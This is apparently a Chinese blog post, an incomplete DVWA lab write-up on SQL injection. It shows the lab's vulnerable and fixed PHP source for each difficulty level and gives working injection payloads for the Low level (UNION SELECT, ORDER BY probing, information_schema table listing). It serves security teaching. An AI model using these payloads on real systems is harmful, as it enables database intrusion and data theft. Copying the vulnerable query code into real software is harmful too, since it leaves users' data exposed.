<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="前言SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。 手工注入的基本步骤 判断是否存在注入，注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定显示的字段顺序 获取当前数据库 获取数据库中的">
<meta name="keywords" content="渗透,DVWA">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA之SQL Injecion">
<meta property="og:url" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/index.html">
<meta property="og:site_name" content="忆时光">
<meta property="og:description" content="前言SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。 手工注入的基本步骤 判断是否存在注入，注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定显示的字段顺序 获取当前数据库 获取数据库中的">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI1.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI2.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI3.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI4.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI5.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI6.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI7.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI8.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI9.jpg">
<meta property="og:updated_time" content="2019-08-19T07:46:28.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DVWA之SQL Injecion">
<meta name="twitter:description" content="前言SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。 手工注入的基本步骤 判断是否存在注入，注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定显示的字段顺序 获取当前数据库 获取数据库中的">
<meta name="twitter:image" content="http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/SI1.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>DVWA之SQL Injecion</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/imysec.github.io">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/04/29/kuan-zi-jie-zhu-ru/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/04/17/dvwa-zhi-file-inclusion/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&text=DVWA之SQL Injecion"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&is_video=false&description=DVWA之SQL Injecion"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DVWA之SQL Injecion&body=Check out this article: http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&name=DVWA之SQL Injecion&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&t=DVWA之SQL Injecion"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#手工注入的基本步骤"><span class="toc-number">2.</span> <span class="toc-text">手工注入的基本步骤</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Low"><span class="toc-number">3.</span> <span class="toc-text">Low</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码"><span class="toc-number">3.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Medium"><span class="toc-number">4.</span> <span class="toc-text">Medium</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-1"><span class="toc-number">4.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-1"><span class="toc-number">4.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#High"><span class="toc-number">5.</span> <span class="toc-text">High</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-2"><span class="toc-number">5.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-2"><span class="toc-number">5.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Impossible"><span class="toc-number">6.</span> <span class="toc-text">Impossible</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-3"><span class="toc-number">6.1.</span> <span class="toc-text">核心代码</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        DVWA之SQL Injecion
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">ca5tle</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-04-22T07:24:17.000Z" itemprop="datePublished">2019-04-22</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Web/">Web</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/DVWA/">DVWA</a>, <a class="tag-link" href="/tags/渗透/">渗透</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。</p>
<h1 id="手工注入的基本步骤"><a href="#手工注入的基本步骤" class="headerlink" title="手工注入的基本步骤"></a>手工注入的基本步骤</h1><ol>
<li>判断是否存在注入，注入是字符型还是数字型</li>
<li>猜解SQL查询语句中的字段数</li>
<li>确定显示的字段顺序</li>
<li>获取当前数据库</li>
<li>获取数据库中的表</li>
<li>获取表中的字段名</li>
<li>下载数据</li>
</ol>
<h1 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h1><h2 id="核心代码"><a href="#核心代码" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_REQUEST[ &#39;Submit&#39; ] ) ) {
    // Get input
    $id = $_REQUEST[ &#39;id&#39; ];

    // Check database
    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39;;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#39;&lt;pre&gt;&#39; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#39;&lt;/pre&gt;&#39; );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row[&quot;first_name&quot;];
        $last  = $row[&quot;last_name&quot;];

        // Feedback for end user
        echo &quot;&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname: {$last}&lt;/pre&gt;&quot;;
    }

    mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);
}

?&gt; 
</code></pre><p>可以看到，Low级别的代码对来自客户端的参数id没有进行任何的检查与过滤，存在明显的SQL注入。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>现实攻击场景下，攻击者是无法看到后端代码的，所以下面的手工注入步骤是建立在无法看到源码的基础上。</p>
<ol>
<li><p>判断是否存在注入，注入是字符型还是数字型<br>输入 <code>1</code> ，查询成功<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI1.jpg" alt=""></p>
<p>输入 <code>1&#39; and &#39;1&#39;=&#39;2</code>，查询失败，<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI2.jpg" alt=""></p>
<p>输入 <code>1&#39; or &#39;1234&#39;=&#39;1234</code>，查询成功，返回多个结果<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI3.jpg" alt=""></p>
<p>说明存在字符型注入。</p>
</li>
<li><p>猜解SQL查询语句中的字段数<br>输入<code>1&#39; or 1=1 order by 1 #</code>，查询成功：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI4.jpg" alt=""></p>
<p>输入<code>1&#39; or 1=1 order by 3 #</code>，查询失败：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI5.jpg" alt=""></p>
<p>输入<code>1&#39; or 1=1 order by 2 #</code>，查询成功：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI6.jpg" alt=""></p>
<p>说明执行的SQL查询语句中只有两个字段，即这里的<code>First name</code>、<code>Surname</code>。</p>
</li>
<li><p>确定显示的字段顺序<br>输入1’ union select 1,2 #，查询成功：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI7.jpg" alt=""></p>
<p>说明执行的SQL语句为<code>select First name,Surname from 表 where ID=’id’…</code></p>
</li>
<li><p>获取当前数据库<br>输入<code>1&#39; union select 1,database() #</code>，查询成功：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI8.jpg" alt=""></p>
<p>说明当前的数据库为dvwa。</p>
</li>
<li><p>获取数据库中的表<br>输入<code>1&#39; union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#</code>，查询成功：<br><img src="/2019/04/22/dvwa-zhi-sql-injecion/SI9.jpg" alt=""></p>
<p>说明数据库dvwa中一共有两个表，<code>guestbook</code>与<code>users</code>。</p>
</li>
<li><p>获取表中的字段名</p>
</li>
</ol>
<h1 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h1><h2 id="核心代码-1"><a href="#核心代码-1" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code> &lt;?php

if( isset( $_POST[ &#39;Submit&#39; ] ) ) {
    // Get input
    $id = $_POST[ &#39;id&#39; ];

    $id = mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $id);

    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = $id;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query) or die( &#39;&lt;pre&gt;&#39; . mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) . &#39;&lt;/pre&gt;&#39; );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row[&quot;first_name&quot;];
        $last  = $row[&quot;last_name&quot;];

        // Feedback for end user
        echo &quot;&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname: {$last}&lt;/pre&gt;&quot;;
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = &quot;SELECT COUNT(*) FROM users;&quot;;
$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#39;&lt;pre&gt;&#39; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#39;&lt;/pre&gt;&#39; );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);
?&gt;
</code></pre><h2 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h1 id="High"><a href="#High" class="headerlink" title="High"></a>High</h1><h2 id="核心代码-2"><a href="#核心代码-2" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_SESSION [ &#39;id&#39; ] ) ) {
    // Get input
    $id = $_SESSION[ &#39;id&#39; ];

    // Check database
    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39; LIMIT 1;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &#39;&lt;pre&gt;Something went wrong.&lt;/pre&gt;&#39; );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row[&quot;first_name&quot;];
        $last  = $row[&quot;last_name&quot;];

        // Feedback for end user
        echo &quot;&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname: {$last}&lt;/pre&gt;&quot;;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);        
}

?&gt; 
</code></pre><h2 id="漏洞利用-2"><a href="#漏洞利用-2" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h1 id="Impossible"><a href="#Impossible" class="headerlink" title="Impossible"></a>Impossible</h1><h2 id="核心代码-3"><a href="#核心代码-3" class="headerlink" title="核心代码"></a>核心代码</h2><pre class=" language-&lt;?php"><code class="language-&lt;?php">
if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br>First name: {$first}<br>Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 
</code></pre>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/imysec.github.io">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#手工注入的基本步骤"><span class="toc-number">2.</span> <span class="toc-text">手工注入的基本步骤</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Low"><span class="toc-number">3.</span> <span class="toc-text">Low</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码"><span class="toc-number">3.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Medium"><span class="toc-number">4.</span> <span class="toc-text">Medium</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-1"><span class="toc-number">4.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-1"><span class="toc-number">4.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#High"><span class="toc-number">5.</span> <span class="toc-text">High</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-2"><span class="toc-number">5.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-2"><span class="toc-number">5.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Impossible"><span class="toc-number">6.</span> <span class="toc-text">Impossible</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-3"><span class="toc-number">6.1.</span> <span class="toc-text">核心代码</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&text=DVWA之SQL Injecion"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&is_video=false&description=DVWA之SQL Injecion"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DVWA之SQL Injecion&body=Check out this article: http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&title=DVWA之SQL Injecion"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&name=DVWA之SQL Injecion&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/04/22/dvwa-zhi-sql-injecion/&t=DVWA之SQL Injecion"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2018-2020
    忆时光
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/imysec.github.io">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
